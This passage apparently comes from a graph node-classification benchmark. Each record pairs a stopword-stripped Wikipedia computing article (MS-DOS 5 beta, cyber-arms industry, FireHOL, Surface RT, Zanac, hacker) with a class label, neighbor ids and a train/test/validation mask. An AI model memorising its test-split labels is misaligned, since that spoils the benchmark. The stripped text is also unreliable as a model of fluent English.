functionality acid degrade performance compensation additional functionality arrival column centric databases store similar information together allow data stored efficiently greater compression ratios allows huge amounts data stored physical space reducing amount memory needed perform query increasing processing speed many users software vendors integrated flash memory systems allow systems scale larger data sets economically oracle integrating flash memory oracle exadata products increased performance microsoft sql server 2012 bi/data warehousing software coupled violin memory flash memory arrays enable in-memory processing data sets greater 20tb users query data loaded system ’ memory thereby avoiding slower database access performance bottlenecks differs caching widely used method speed query performance caches subsets specific pre-defined organized data in-memory tools data available analysis large data mart small data warehouse entirely memory accessed quickly multiple concurrent users applications detailed level offers potential enhanced analytics scaling increasing speed application theoretically improvement data access speed 10,000 1,000,000 times compared disk also minimizes need performance tuning staff provides faster service end users certain developments computer technology business needs tended increase relative advantages in-memory technology range in-memory products provide ability connect existing data sources access visually rich interactive dashboards allows business analysts end users create custom reports queries without much training expertise easy navigation ability modify queries fly benefit many users since dashboards populated fresh data users access real time data create reports within minutes in-memory processing may particular benefit call centers warehouse management in-memory processing source database queried instead accessing database every time query run thereby eliminating repetitive processing reducing burden database servers scheduling populate in-memory database overnight database servers used operational purposes peak hours large number users large amount ram needed in-memory configuration turn affects hardware costs investment likely suitable situations speed query response high priority significant growth data volume increase demand reporting facilities may still cost-effective information subject rapid change security another consideration in-memory tools expose huge amounts data end users makers advise ensuring authorized users given access data",
    "neighbors": [
      3219,
      11030,
      2456,
      8353,
      10658,
      675,
      2339,
      10413,
      3886,
      10675,
      2234,
      10048,
      4036,
      9286,
      2383,
      7767,
      862,
      11487,
      2273,
      5090,
      10340,
      1382,
      1770,
      5355,
      7022,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4812,
    "label": 2,
    "text": "MS-DOS_5_Beta:ms-dos 5 beta ms-dos 5.0 project started december 1989 ms-dos 5.0 codename lifeboat based ms-dos 4.00 code ms-dos 5.00 first version ms-dos use betas builds several ms-dos 5.00 betas released final launch",
    "neighbors": [
      9166
    ],
    "mask": "Test"
  },
  {
    "node_id": 4813,
    "label": 4,
    "text": "Cyber-arms_industry:cyber-arms industry cyber-arms industry markets associated events surrounding sale software exploits zero-days cyberweaponry surveillance technologies related tools term may extend grey black markets online offline many years burgeoning dark web market remained niche available in-the-know well funded since least 2005 western governments including u.s. united kingdom russia france israel buying exploits defence contractors individual hackers 'legitimate market zero day exploits exists well advertised immediately accessible attempts openly sell zero day exploits governments security vendors keep black market far unsuccessful traditional arms producers military services companies bae systems eads leonardo general dynamics raytheon thales expanded cybersecurity markets however smaller software companies blue coat amesys also become involved often drawing attention providing surveillance censorship technologies regimes bashar al-assad syria muammar gaddafi libya suppliers exploits western governments include massachusetts firm netragard trade show iss world runs every months referred 'international cyber arms bazaar 'wiretappers ball focuses surveillance software lawful interception popular internet forums generally russian ukrainian reports english-only chinese-only german-only vietnamese-only sites among others phishing spear-phishing social engineer campaigns typically done english majority potential victims know language india central bureau investigation describe proliferation underground markets 'widespread colonel john adams head marine corps intelligence activity expressed concerns markets could allow cyberweapony fall hands hostile governments would otherwise lack expertise attack advanced country computer systems online increasing uses encryption privacy mechanisms record messaging cryptocurrencies since 2005 darknet markets black markets 'cyber arms bazaar prices dropping fast cost cyberweapony plummeting least 90 percent botnets increasingly rented cyber criminals commodities variety purposes rdp shops offer cheap access hacked computers recent years many software firms success bug bounty programs cases vupen chrome exploit rejected market value meanwhile vendors hp spent 7 million 2005 2015 buying exploits software behaviour criticised head united states cyber command general keith alexander building black market",
    "neighbors": [
      3520,
      2148,
      3423,
      711,
      5384,
      297,
      3629,
      7759,
      3473,
      4689,
      4883,
      3092,
      4945,
      6326,
      9688,
      3290,
      6588,
      127
    ],
    "mask": "Train"
  },
  {
    "node_id": 4814,
    "label": 4,
    "text": "FireHOL:firehol firehol shell script designed wrapper iptables written ease customization linux kernel firewall netfilter firehol graphical user interface configured easy understand plain text configuration file advantage firehol friendliness beginners n't worry answer packet firehol first parses configuration file sets appropriate iptables rules achieve expected firewall behavior large complex bash script file depending iptables console tools rather communicating kernel directly advantage portability linux system iptables bash appropriate tools run main drawback slower starting times particularly older systems since delay happens per boot—or less resulting rules saved disk—high performance generally important except embedded systems firehol also benefits shell flexibility easily extended configured high degree firehol configuration files fully functional bash scripts one write scripts normal shell syntax operate expected one might loop firehol statement forward entire set ports example firehol free software open-source distributed terms gnu general public license",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      6797,
      10387,
      1172,
      9496,
      3482,
      1436,
      4511,
      6431,
      10531,
      5924,
      550,
      8998,
      10790,
      3243,
      1708,
      3885,
      7983,
      8753,
      823,
      569,
      5178,
      11577,
      9279,
      5057,
      1858,
      10433,
      11073,
      2118,
      10574,
      9423,
      7121,
      10451,
      10708,
      11221,
      4568,
      4953,
      9048,
      2907,
      6364,
      5860,
      3942,
      10987,
      8943,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4815,
    "label": 6,
    "text": "Ntfsprogs:ntfsprogs ntfsprogs collection free unix utilities managing ntfs filesystem used windows nt operating system since version 3.1 hard disk partition 'ntfsprogs first stable method writing ntfs partitions linux ntfs versions supported used 32-bit 64-bit windows ntfsprogs remains popular way interacting ntfs partitions included linux distributions live cds also versions compiled windows april 12 2011 tuxera announced ntfsprogs project merged ntfs-3g programs included basic functionality and/or intended developers",
    "neighbors": [
      7136,
      3841,
      7810,
      9762,
      3975,
      7983,
      8976,
      2193,
      5492,
      5397,
      823,
      1150,
      639
    ],
    "mask": "None"
  },
  {
    "node_id": 4816,
    "label": 2,
    "text": "Surface_(2012_tablet):surface 2012 tablet first-generation surface launched surface windows rt later marketed surface rt hybrid tablet computer developed manufactured microsoft announced june 18 2012 released october 26 2012 first ever personal computer designed in-house microsoft positioned direct competitor apple ipad line surface included several notable features including folding kickstand allowed tablet stand angle ability attach optional protective covers incorporated keyboards surface served launch device windows rt variation windows 8 designed devices based arm architecture windows rt contains notable differences limitations compared windows 8 including several removed features bundled special edition microsoft office 2013 home student besides software included operating system incompatible desktop software runs windows 8 personal computers tablets intel compatible processors windows rt run metro-style apps obtained windows store however visually resembling surface pro 2-in-1 detachable surface considered 2-in-1 pc fact variant hybrid tablet surface met mixed reviews although praised hardware design accessories aspects operating system criticism directed towards performance device well limitations windows rt operating system application ecosystem sales surface poor microsoft cutting price worldwide taking us 990 million loss july 2013 result succeeded surface 2 2013 comes newer rt 8.1 os original surface also since received update support surface 2 end 2023 device announced press-only event los angeles first pc microsoft designed manufactured in-house surface supports wifi wireless connectivity cellular variant tablet went sale eight countries australia canada china france germany hong kong united kingdom united states surface pro launched later surface tablet display 1366x768 pixels five-point multi-touch touchscreen gorilla glass 2 device measures made magnesium kickstand usb port magnetic keyboard interface give surface ability add wireless mouse external keyboard thumb drive also slot microsd card add 200 gb surface runs windows rt preloaded windows mail calendar contacts sports news travel finance camera weather reader skydrive store photos skype longer supported maps games messaging bing desktop xbox music xbox video windows store applications supports microsoft office home student 2013 rt includes word powerpoint excel onenote within desktop application windows rt allows installing windows store applications windows rt compiled entirely arm instruction set architecture major update windows rt 8.0 launched october 17 2013 called windows rt 8.1 update brought many improvements surface overhauled mail app bing apps like reading list onedrive updated skydrive also brought support larger tiles help tips app internet explorer 11 outlook 2013 rt changes pc settings lockscreen photo slideshow infinitely re-sizable apps start button speed improvements later update windows rt 8.1 dubbed windows rt 8.1 update added search button start screen well taskbar modern ui title bar modern ui apps surface launched two accessories type cover touch cover touch cover came white black magenta red cyan type cover came black limited edition touch covers released featuring laser-etched artwork back touch type covers double keyboards magnetically attach surface accessory spine later adapters micro-hdmi hdmi vga released cnet praised design surface noting looked practical without cold feels like high-quality device microsoft cut corners make kickstand also praised feel quality kickstand keyboard cover accessories also noted satisfying clicking sound engaged attached covers deemed essential getting complete surface experience touch cover praised spacious typing area tablet keyboard attachments usable getting used soft feel type cover recommended touch cover due higher quality conventional key design surface display praised larger size widescreen aspect ratio ipad line panned muted color reproduction touchscreen-oriented aspects windows 8 interface praised elegant albeit harder learn android ios windows rt operating system panned still requiring use mouse-oriented desktop interface access applications settings accessible within metro shell poor application ecosystem windows store state on-launch compared ghost town apocalypse surface also panned poor performance especially comparison tegra 3-based tablets conclusion felt paired keyboard cover surface excellent office productivity tool best tablet form entertainment needs n't go far beyond movies tv shows music occasional simple game 're covered well assuming windows store would eventually improve application selection surface wonky performance keep useful productivity device reaching true tablet greatness sales surface windows rt devices poor july 2013 microsoft reported loss us 900 million due lackluster sales surface cut price 30 worldwide microsoft price cut result slight increase market share device late-august 2013 usage data advertising network adduplex provides advertising services within windows store apps revealed surface share increased 6.2 9.8",
    "neighbors": [
      4356,
      11524,
      5384,
      6539,
      6797,
      782,
      1935,
      10900,
      3605,
      9498,
      11549,
      7970,
      1832,
      6827,
      7983,
      3890,
      8757,
      10303,
      4289,
      9033,
      2635,
      10957,
      4051,
      11221,
      11605,
      2777,
      11103,
      10338,
      3304,
      617,
      8681,
      9964,
      1400
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4817,
    "label": 7,
    "text": "Shared-nothing_architecture:shared-nothing architecture shared-nothing architecture sn distributed-computing architecture update request satisfied single node processor/memory/storage unit intent eliminate contention among nodes nodes share independently access memory storage one alternative architecture shared everything requests satisfied arbitrary combinations nodes may introduce contention multiple nodes may seek update data time sn eliminates single points failure allowing overall system continue operating despite failures individual nodes allowing individual nodes upgrade without system-wide shutdown sn system scale simply adding nodes since central resource bottlenecks system another term sn sharding sn system typically partitions data among many nodes refinement replicate commonly used infrequently modified data across many nodes allowing requests resolved single node michael stonebraker university california berkeley used term 1986 database paper teradata delivered first sn database system 1983 tandem computers released nonstop sql shared nothing database 1984 shared-nothing popular web development shared-nothing architectures prevalent data warehousing applications although requests require data multiple nodes dramatically reduce throughput",
    "neighbors": [
      11136,
      8195,
      8965,
      7175,
      9225,
      5772,
      3990,
      4630,
      9883,
      7581,
      4255,
      6433,
      8226,
      8229,
      7085,
      9782,
      11203,
      5956,
      9285,
      1606,
      333,
      11343,
      337,
      2901,
      3927,
      4696,
      2011,
      1636,
      5999,
      1142,
      7288,
      7802,
      3196
    ],
    "mask": "Test"
  },
  {
    "node_id": 4818,
    "label": 3,
    "text": "Zanac:zanac released msx computer family computer disk system nintendo entertainment system virtual console reworked msx2 computer zanac ex playstation zanac x zanac players fly lone starfighter dubbed afx-6502 zanac twelve levels goal destroy system —a part-organic part-mechanical entity bent destroying mankind zanac developed main core developers compile including masamitsu moo niitani koji janus teramoto takayuki jemini hirono developers went make popular similarly-based games guardian legend blazing lazers puyo puyo series game known intense fast-paced gameplay level difficulty music seems match pace game praised unique adaptive artificial intelligence game automatically adjusts difficulty level according player skill level rate fire ship current defensive status/capability zanac player controls spaceship afx-6502 zanac flies various planets space stations outer space armada enemies comprising defenses game main antagonist—the system player must fight twelve levels destroy system defenses objective shoot enemies projectiles accumulate points players start three lives lose life get hit enemy projectile losing life gameplay continues player reappearing screen losing previously accumulated power-ups player remains temporarily invincible moment upon reappearing screen game ends player lives lost completing twelfth final area however player earn 1-ups extra lives throughout game accumulating high point scores zanac continue option allows players restart game level lost lives player operates rapid-fire main cannon upgraded collecting power-ups found blue boxes periodically descend top screen main cannon power level upgraded number bullets fired ship well speed increases addition player operates specialty weapon separate main cannon eight different specialty weapons represented differently-numbered power-ups player change type specialty weapon equipped collecting differently-numbered power-up upgrade current specialty weapon collecting numbered power-up matches current weapon weapons range directional bullets shields indestructible projectiles players lose accumulated power-ups lose life enemies zanac include meteors various bullet-shooting enemy aircraft bullet-resistant disks ground turrets reconnaissance planes bosses consist stationary fortresses consisting entirely ground turrets player must destroy turrets within specified time limit score bonus points every stage one stationary fortresses addition large enemy ships acting mini-bosses appear throughout game ships resistant player weaponry bullets inflict minor damage repelled mini-bosses change color become damaged distinguishing aspect zanac gameplay unique enemy artificial intelligence called automatic level difficulty control alc alc measures system aggressiveness game difficulty depending actions player attack pattern skill level alc increases experts decreases inexperienced players instance shooting main cannon frequently collecting power-ups failing destroy bosses within specified time limit increases alc resulting greater number tougher enemies appearing screen however actions losing lives starting new level destroying reconnaissance planes reduces alc resulting fewer on-screen enemies plot zanac revolves around system —a device figuratively similar pandora box system created millennia ago unknown alien race contains boundless wisdom knowledge well vast destructive potential properly opened would grant access untold wisdom technology improperly accessed would unleash almost unlimited destruction mankind attempted access system failed causing system spread throughout space exert mass destruction forms life including human race mankind discovered properly access knowledge technology within system could shut destructive expansion vast tactical systems moreover defenses system designed around destroying overcoming entire fleets mankind hopes lone starfighter may able slip penetrate defenses system allowing ship fight way heart system destroy afx-6502 zanac advanced starfighter ever produced launched desperate mission fight way heart system shut zanac initially released 1986 msx computer japanese video game company compile—the company responsible games blazing lazers devil crush puyo puyo series compile re-released game msx2 computer later year zanac ex featured improved graphics sound original msx version zanac ported heavily reworked release family computer disk system japan north america nes october 1987 nes version later re-released wii virtual console service published d4 enterprise version identical nes version released 1987 compile released compilation titled zanac x zanac sony playstation console japan commemorate 15th anniversary original compilation features updated version zanac —titled zanac neo —and three versions nes version game including version featuring enhanced graphics sound game features two-player cooperative gameplay well remix game soundtrack zanac retrospect considered unique shoot 'em game combining gameplay elements games xevious especially extensive power-up system vertical-scrolling gameplay features air ground targets brett alan weiss allgame praised zanac calling extremely fast-paced shooter player almost completely surrounded enemy ships bullets praises game music seems flow along action game calls music least close get zen moment playing shooting game nes frank provo gamespot lauded zanac difficulty level ability handle many sprites screen without slowdown glitches unique ai placed game subgenre however criticisms include mediocre primitive music sound steep learning curve gameplay difficulty level poor translation game game instruction manual addition weiss says enemies zanac fearsome n't much personality",
    "neighbors": [
      4818,
      226,
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 4819,
    "label": 6,
    "text": "Case_preservation:case preservation computer file system stores file names computer may keep discard case information case stored called case preservation system case-preserving necessarily case-insensitive possible common system case-insensitive yet case-preserving combination often considered natural people understand people prefer using correct capitalization still recognize others example someone refers united states america understood mean united states america even though capitalization incorrect versions macos prior introduction apfs current versions microsoft windows operating systems versions amiga os case-preserving case-insensitive cases since case-insensitive requesting file name capitalization used contrast case-sensitive systems single capitalization would work case-preserving viewing file name presented capitalization used file created non-case-preserving system arbitrary capitalization would displayed instead upper- lower-case also case-insensitive case preserving file systems readme.txt readme.txt folder examples systems various case-sensitivity case-preservation exist among file systems",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      1801,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 4820,
    "label": 4,
    "text": "Security_Technical_Implementation_Guide:security technical implementation guide security technical implementation guide stig cybersecurity methodology standardizing security protocols within networks servers computers logical designs enhance overall security guides implemented enhance security software hardware physical logical architectures reduce vulnerabilities examples stigs would benefit configuration desktop computer enterprise server operating systems inherently secure leaves open criminals identity thieves computer hackers stig describes minimize network-based attacks prevent system access attacker interfacing system either physically machine network stigs also describe maintenance processes software updates vulnerability patching advanced stigs might cover design corporate network covering configurations routers firewalls domain name servers switches",
    "neighbors": [
      1762,
      9293,
      11446,
      7354,
      635,
      5404,
      1567
    ],
    "mask": "None"
  },
  {
    "node_id": 4821,
    "label": 3,
    "text": "Hercules_(processors):hercules processors hercules line arm architecture-based microcontrollers texas instruments built around one arm cortex cores hercules safety microcontroller platform includes series microcontrollers specifically targeted functional safety applications hardware-base fault correction/detection features dual cores run lock-step full path ecc automated self testing memory logic peripheral redundancy monitor/checker cores line includes tms470m tms570 rm4 families families designed specifically iec 61508 iso 26262 safety critical applications however differ significantly degree support safety standards",
    "neighbors": [
      7170,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      8250,
      8253,
      7745,
      7235,
      7747,
      2635,
      99,
      8812,
      11374,
      10361,
      638,
      644,
      8842,
      146,
      659,
      1170,
      7833,
      666,
      5786,
      4258,
      4773,
      9911,
      9913,
      1722,
      10945,
      9928,
      2788,
      3301,
      9964,
      6391,
      3835,
      4868,
      781,
      5417,
      7988,
      10548,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      5028,
      7077,
      9638,
      3511,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 4822,
    "label": 9,
    "text": "Lively_Kernel:lively kernel lively kernel open-source web programming environment supports desktop-style applications rich graphics direct manipulation abilities without installation upgrade troubles conventional desktop applications development began sun microsystems laboratories menlo park california later moved hasso plattner institute potsdam-babelsberg near berlin lively kernel graphical composition integrated programming environment written fully programming language javascript using standard browser graphics w3c canvas svg thus accessible browser web page begins operating soon web page loaded able edit code graphics built-in webdav support save results even clone onto new web pages along application development abilities also function integrated development environment ide making whole system self-sufficient tools except browser lively kernel uses morphic graphics model add behavior scene graph built browser graphics simple graphics thus assembled standard widgets sliders scroll bars text views lists clipping frames simple window system built widgets offers object inspectors file browsers code browsers even rudimentary demo pages thus ability edit test new code simple code browser system running lively used build simple web sites including tutorial also client-side wiki system stores pages versioned repository content vary relatively static pages text fully dynamic models look behave like adobe flash simulations lively kernel achieves complex dynamic behavior without specific animation support use animation features svg simple scheduling multiple green-thread processes javascript lively kernel includes multifont text editor written javascript includes support centering justification similar rudimentary text composition abilities working lively thus much feel working web page design program except on-the-fly text layout done offline composition program built-in dynamic behavior text lively kernel liveliness lively graphics becomes even apparent manipulating scale rotation handles objects text whole code browser used tilted 20 degrees side text editor made entirely lively graphics works perfectly well rotated scaled scroll bars clipping frames rest entire user interface lively kernel depends browser support javascript svg canvas graphics part w3c standards 2009 means runs safari firefox chrome opera browsers requirement might seem less compatible html lively actually compatible across browsers runs html uniformity among javascript svg canvas implementations one html implementation another except one small initial file lively kernel code base entirely free tests client browser used 2011 lively kernel runs best webkit-based browsers safari macintosh chromium google chrome windows running internet explorer windows requires google chrome frame testing popular browsers planned next release lively includes integrated development environment considerable power designed work via webdav local set dozen source javascript files synchronizable versioned repository user opens systembrowser javascript source files listed file pane browser user clicks one files read parsed ometa javascript parser displayed similar smalltalk browser functions class definitions listed class method names shown user click method name edit code bottom pane save new definition new definition checked syntax correct stored back .js file moreover eval mode usual case method redefined system running allows non-critical changes made without need restart lively applications developed source files loaded rapid scan find every reference selected text present code bodies match separate sub-browser lively ide includes object inspectors morph style panels controlling fills borders text styles also facilities debugging error points profiling performance tuning pushed owing improving quality run-time support major browsers ide operates source code files versioned repository manage evolution lively code base approach used empower users control active web content form client-side wiki lively includes facilities edit content worlds scene graphs content store content web pages webdav connection allows lively store new versions page content incrementally developed new version saved viewable rest internet prior versions retrieved cases error change mind notable wiki style evolving web content extends textual graphical scripting content lively well new forms may defined yet without need wiki server kind required server providing http webdav interface increasing amounts lively project content maintained manner lively qt new implementation lively kernel kernel parts replaced functionality offered qt framework lively qt inherits basic functionality implementation widgets layout management core event handling core javascript support qt lively qt retains exceptionally interactive nature liveliness lively kernel e.g. allowing user interface application source code edited fly however lively qt development work performed using familiar well-documented apis qt platform",
    "neighbors": [
      9732,
      2062,
      9245,
      2603,
      5165,
      5677,
      3631,
      576,
      8771,
      8262,
      4171,
      84,
      10841,
      603,
      2658,
      5219,
      5743,
      8303,
      2673,
      8304,
      9841,
      9848,
      5754,
      7292,
      1664,
      1666,
      6791,
      6797,
      3734,
      8854,
      4777,
      3761,
      11442,
      692,
      7871,
      9943,
      9434,
      7396,
      10470,
      10480,
      259,
      10507,
      9491,
      1812,
      4378,
      7455,
      803,
      3876,
      11559,
      7983,
      11060,
      2880,
      1347,
      1348,
      8524,
      11087,
      339,
      9560,
      8554,
      5483,
      9579,
      10097,
      3442,
      5492,
      1409,
      3462,
      8582,
      8584,
      6539,
      8605,
      10654,
      9128,
      8618,
      438,
      9152,
      9665,
      8644,
      4550,
      7629,
      5078,
      4056,
      479,
      482,
      487,
      5612,
      2045,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4823,
    "label": 9,
    "text": "Logic_error:logic error computer programming logic error bug program causes operate incorrectly terminate abnormally crash logic error produces unintended undesired output behaviour although may immediately recognized logic errors occur compiled interpreted languages unlike program syntax error program logic error valid program language though behave intended often clue existence logic errors production wrong solutions though static analysis may sometimes spot one ways find type error output program variables file screen order determine error location code although work cases example calling wrong subroutine easiest way find problem program uses incorrect results bad mathematical calculation example function c calculate average two numbers contains logic error missing parentheses calculation compiles runs give expected answer due operator precedence division evaluated addition",
    "neighbors": [
      1952,
      805,
      3367,
      10510,
      4592,
      9714,
      4572,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4824,
    "label": 5,
    "text": "Wireless_Framework_Telecommunication_(code_name:_Beep):wireless framework telecommunication code name beep wireless framework telecommunication beep implementation xmpp protocol mobile devices enable two roaming mobile devices positioned two different locations exchange data order communication stream successful mobile devices must connected internet wireless technology regardless wireless technologies using internet acts middle carrier developers trying best offer communication services highest possible quality relieve user paying current high costs communication moreover project empower client mobile device roaming capabilities allowing mobile device easily locate initiate interaction session another mobile device within unlimited range beep implementation generic high level abstract well-defined framework supports wireless communication internet enabling two roaming mobile devices exchange data necessarily using wireless technology use protocol enable developers program application run top protocol exchange data different types licensed gnu general public license gpl",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4825,
    "label": 4,
    "text": "Ziften:ziften ziften cybersecurity software company based austin texas united states organization endpoint protection platform designed provide advanced anti-virus endpoint detection response endpoint visibility hardening enterprise laptops desktops servers cloud ziften founded 2009 mark obrecht previously founded whole security behavior-based security anti-phishing company sold symantec 2005 july 2011 ziften raised 5.8 million capital series round trellis partners fayez sarofim co may 2012 ziften raised 5.5 million capital series b round fayez sarofim co july 2015 ziften raised 24 million capital new york-based spring mountain capital lp fayez sarofim co april 2017 ziften raised additional 14.7m trousdale ventures organization total funding date 50m mike hamilton previously ziften chief product officer appointed ceo june 2018 september 2017 ziften announced series managed security services called managed assess service managed hunt service managed respond service designed help organizations augment security teams getting additional help monitoring edr analytics security forensics november 2017 microsoft announced new partnerships windows defender advanced threat protection atp service including integration ziften zenith security platform macos linux operating system support integration provides security events onboarded macos linux devices surfaces within windows defender atp console ziften later included member initial formation microsoft intelligent security association august 2018 ziften enhanced zenith endpoint protection platform advanced anti-virus capabilities new capabilities help block file-based file-less in-memory attacks zenith uses artificial intelligence ai cloud help protect enterprises",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 4826,
    "label": 4,
    "text": "National_Cybersecurity_Center_of_Excellence:national cybersecurity center excellence national cybersecurity center excellence nccoe us government organization builds publicly shares solutions cybersecurity problems faced u.s. businesses center located rockville maryland established 2012 partnership national institute standards technology nist state maryland montgomery county center partnered nearly 20 market-leading companies contribute hardware software expertise nccoe asks industry sector members cybersecurity problems selects issues affect entire sector reaches across sectors center forms team people cybersecurity technology companies federal agencies academia address problem teams work center ’ labs build example solutions using commercially available off-the-shelf products example solution nccoe publishes practice guide collection materials information needed deploy example solution makes available general public center ’ goal “ accelerate deployment use secure technologies ” help businesses improve defenses cyber attack nccoe part nist non-regulatory federal agency within u.s. department commerce develops measurement standards conducts research measurement science according nist website federal information security management act 2002 fisma “ reaffirmed nist ’ role developing information security standards federal information processing standards guidelines non-national security federal information systems assigned nist specific responsibilities including development standards used federal agencies categorize information information systems based objectives providing appropriate levels information security according range risk levels guidelines recommending types information information systems included category minimum information security requirements management operational technical security controls information information systems category. ” many private sector organizations voluntarily adopt standards guidelines security requirements nist center nccoe applied space demonstration standards-based approaches cybersecurity president barack obama issued executive order 13636 “ improving critical infrastructure cybersecurity ” february 2013 tasking nist create cybersecurity framework helps organizations mitigate risks nation ’ essential systems power generation distribution financial services sector transportation nist released framework improving critical infrastructure cybersecurity february 2014 “ consists standards guidelines practices promote protection critical infrastructure. ” nccoe demonstrates framework implemented real-world environments industrial sector approaches center cybersecurity problem center maps solution ’ hoped-for capabilities cybersecurity framework well standards controls best practices nccoe ’ launch formally announced february 21 2012 u.s senator barbara mikulski d-md maryland lt governor anthony brown montgomery county executive isiah leggett secretary commerce standards technology nist director patrick d. gallagher nist issued press release day stating center created “ work strengthen u.s. economic growth supporting automated trustworthy e-government e-commerce. ” nccoe “ host multi-institutional collaborative efforts build expertise industry government ” according press release september 2014 national institute standards technology nist awarded contract mitre corporation operate department commerce ’ first federally funded research development center ffrdc national cybersecurity ffrdc supports nccoe according press release nist website “ ffrdc first solely dedicated enhancing security nation ’ information systems. ” press release states ffrdc help nccoe “ expand accelerate public-private collaborations ” focus “ boosting security u.s. information systems. ” “ ffrdcs operate public interest required free organizational conflicts interest well bias toward particular company technology product—key attributes given nccoe ’ collaborative nature…the first three task orders contract allow nccoe expand efforts developing use cases building blocks provide operations management facilities planning. ” partners founded nccoe national institute standards technology nist state maryland montgomery county partnership instrumental establishing center nationally recognized cybersecurity resource potential increase number local cybersecurity companies local workforce development provide local companies exposure nist ’ expertise national cybersecurity excellence partners nceps offer technology companies opportunity develop long-term relationships nccoe nist core partners nceps provide hardware software personnel collaborate nccoe current projects sector representatives approach nccoe behalf industry share business problems solved cybersecurity solution representatives also provide insight project build process help validate center ’ approach developing example solution members government agencies academic institutions discuss cybersecurity challenges nccoe provide insight feedback existing center projects collaborate technology companies center ’ labs users businesses working improve cybersecurity opportunity test nccoe ’ example solutions evaluate effectiveness provide feedback",
    "neighbors": [
      8042,
      5780
    ],
    "mask": "Test"
  },
  {
    "node_id": 4827,
    "label": 5,
    "text": "CryptoNote:cryptonote cryptonote application layer protocol aims solve problems outlined bitcoin core protocol behind bitcoin protocol powers several decentralized privacy-oriented cryptocurrencies nothing known original author cryptonote nicolas van saberhagen",
    "neighbors": [
      9248,
      3713,
      8706,
      9859,
      6797,
      7983,
      1908,
      5397,
      8916,
      11612,
      4280,
      764,
      1087
    ],
    "mask": "Test"
  },
  {
    "node_id": 4828,
    "label": 4,
    "text": "National_Collegiate_Cyber_Defense_Competition:national collegiate cyber defense competition national collegiate cyber defense competition nccdc championship event collegiate cyber defense competition system – largest college-level cyber defense competition usa event held annually san antonio area effort help facilitate development regular national level cyber security exercise center infrastructure assurance security university texas san antonio utsa hosted first collegiate cyber defense competition southwestern region may 2005 june 29 2010 united states house legislature passed recognizing national ccdc promoting cyber security curriculum similar cyber defense competitions many aspects nccdc unique focuses operational aspect managing protecting existing network infrastructure exercises examine abilities group students design configure protect network course entire semester competition focused operational task assuming administrative protective duties existing commercial network teams assessed based ability detect respond outside threats maintain availability existing services mail servers web servers respond business requests addition removal additional services balance security needs business needs nccdc operated rules published center infrastructure assurance utsa current rules found homepage several regional groups formed provide qualifying events nccdc annual event regions share overlap various states every effort made make regional event consistent nccdc event",
    "neighbors": [
      9175
    ],
    "mask": "Test"
  },
  {
    "node_id": 4829,
    "label": 6,
    "text": "CRFS:crfs crfs coherent remote file system network file system protocol zach brown formerly oracle intended leverage btrfs architecture gain higher performance existing protocols nfs smb expose btrfs features snapshots remote clients code unmaintained one looking network file system top btrfs number options available active support development including ceph beegfs glusterfs samba",
    "neighbors": [
      2395,
      8772,
      3582
    ],
    "mask": "Train"
  },
  {
    "node_id": 4830,
    "label": 4,
    "text": "Hacker:hacker computer hacker skilled computer expert uses technical knowledge overcome problem hacker refer skilled computer programmer term become associated popular culture security hacker someone technical knowledge uses bugs exploits break computer systems reflecting two types hackers two definitions word hacker today mainstream usage hacker mostly refers computer criminals due mass media usage word since 1980s includes hacker slang calls script kiddies people breaking computers using programs written others little knowledge way work usage become predominant general public largely unaware different meanings exist self-designation hobbyists hackers generally acknowledged accepted computer security hackers people programming subculture consider computer intrusion related usage incorrect emphasize difference two calling security breakers crackers analogous safecracker controversy usually based assertion term originally meant someone messing something positive sense using playful cleverness achieve goal supposed meaning term shifted decades came refer computer criminals security-related usage spread widely original meaning become less known popular usage media computer intruders computer criminals exclusive meaning word today example internet 'hacker broke state government security systems march computer enthusiast hacker culture community primary meaning complimentary description particularly brilliant programmer technical expert example linus torvalds creator linux considered hacker large segment technical community insist latter correct usage word see jargon file definition mainstream media current usage term may traced back early 1980s term introduced wider society mainstream media 1983 even computer community referred computer intrusion hacking although exclusive definition word reaction increasing media use term exclusively criminal connotation computer community began differentiate terminology alternative terms cracker coined effort maintain distinction hackers within legitimate programmer community performing computer break-ins terms black hat white hat gray hat developed laws breaking computers came effect distinguish criminal activities activities legal however network news use term consistently pertained primarily criminal activities despite attempt technical community preserve distinguish original meaning today mainstream media general public continue describe computer criminals levels technical sophistication hackers generally make use word non-criminal connotations members media sometimes seem unaware distinction grouping legitimate hackers linus torvalds steve wozniak along criminal crackers result definition still subject heated controversy wider dominance pejorative 